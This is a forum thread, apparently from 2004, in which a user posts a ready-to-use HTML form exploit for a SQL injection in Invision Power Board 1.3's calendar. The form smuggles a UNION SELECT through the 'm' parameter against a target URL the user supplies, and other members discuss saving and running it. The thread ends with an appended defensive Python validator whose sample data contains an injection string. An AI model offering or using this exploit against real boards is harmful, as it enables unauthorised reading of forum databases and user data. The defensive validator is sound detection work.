
GaLiaRePt
--------------------IPBexploit.html--------------------


CODE
<html>
<head><title>
Invision Power Board Free 1.3 FINAL SQL Injection Problems
</title></head> <body>
<form action='/index.php?act=calendar' method='post'
onsubmit="this.m.value='2 )) UNION
'+this.request.value+'#';this.action=this.url.value+this.action;">
<b>IPB directory URL :</b> <input type='text' size='45' name='url'
value='http://forum.target.com'><br><br>
<b>SQL SELECT REQUEST :</b> <input type='text' size='80' name='request'
value='SELECT * FROM ibf_calendar_events'><br><br>
<u>Attention :</u> The request result MUST have this structure :<br><br>
INT,INT,INT,INT,INT,STR,STR,STR,INT,INT,INT,INT,INT,INT,CHAR(2),INT,INT,
INT,INT,STR,STR<br><br>
<input type='hidden' name='y' value='2004'>
<input type='hidden' name='m'>
<input type='submit' value='Execute'>
</form>
<br><br><br>
<p align="right">A patch can be found on <a
href="http://www.phpsecure.info" target="_blank">phpSecure.info</a>.<br>
For more informations about this exploit :
<a href="http://www.security-corporation.com/advisories-025.html"
target="_blank">
Security-Corporation.com</a></p>
</body>
</html>



--------------------IPBexploit.html--------------------

Source here
FiStEh
Thanky muchly. But I'm not too sure as to the function of this.
ara
Heh, isn't this the exact thing this board is running on? Hopefully patched by now.
Iced_Eagle
FiStEh: copy and paste that code into like Notepad and save it as a .html

I wish I could know SQL so I could test it.
nubela
lol. Hope this exploit doesn't affect this forum.
Anyway, can you elaborate on the vulnerabilities?

And what's the function of the exploit?
Iced_Eagle
*edit* A vulnerability has been discovered in the sources/calendar.php file
that allows unauthorized users to inject SQL commands.

*edit2* I think I compiled that wrong or something... 'cause whenever I input a web address and I hit execute it goes back to C:/index.php

help?
Steffan
QUOTE (Iced_Eagle @ Feb 9 2004, 02:07 AM)
*edit2* I think I compiled that wrong or something... 'cause whenever I input a web address and I hit execute it goes back to C:/index.php

help?

You compile it??????????????

You mean you execute it?!!! Install a board on your CPU and let it run against it.

C'ya
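
For anyone defending a board against the calendar issue discussed in this thread: the posted form works by putting SQL text into the `m` field of an `act=calendar` request, so a server-side or log-side check only has to confirm that the calendar's numeric fields really are numbers. The sketch below is an added example, not part of the original thread or of Invision's code; the function names, the accepted ranges for `m` and `y`, and the sample requests are assumptions constructed for illustration.

```python
from urllib.parse import parse_qs

# Assumed valid ranges for the calendar's month and year parameters
# (the field names m and y are taken from the form posted in the thread).
LIMITS = {"m": (1, 12), "y": (1970, 2100)}


def bad_calendar_fields(query, body):
    """Return (field, raw_value) pairs that are not plain in-range integers.

    query is the URL query string, body the form-encoded POST body.
    Requests that are not act=calendar return an empty list.
    """
    q = parse_qs(query, keep_blank_values=True)
    b = parse_qs(body, keep_blank_values=True)
    if "calendar" not in q.get("act", []) + b.get("act", []):
        return []
    bad = []
    for name, (lo, hi) in LIMITS.items():
        for raw in q.get(name, []) + b.get(name, []):
            # Digits only, short enough to convert safely, and within range.
            ok = (raw.isascii() and raw.isdigit() and len(raw) <= 4
                  and lo <= int(raw) <= hi)
            if not ok:
                bad.append((name, raw))
    return bad


# Constructed sample requests: (query string, POST body).
SAMPLES = [
    ("act=calendar", "y=2004&m=2"),
    ("act=calendar",
     "y=2004&m=2+%29%29+UNION+SELECT+%2A+FROM+ibf_calendar_events%23"),
    ("act=calendar", "y=2004&m=13"),
    ("act=Login", "m=abc"),
]


def scan(samples):
    """Return (index, bad_fields) for every sample that fails validation."""
    hits = []
    for i, (query, body) in enumerate(samples):
        bad = bad_calendar_fields(query, body)
        if bad:
            hits.append((i, bad))
    return hits


if __name__ == "__main__":
    for index, bad in scan(SAMPLES):
        print(f"sample {index}: rejected fields {bad}")
```

The same rule applied inside the application (reject or cast the value before it reaches the query) closes the hole; applied to request logs it shows whether the form was ever pointed at the board.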
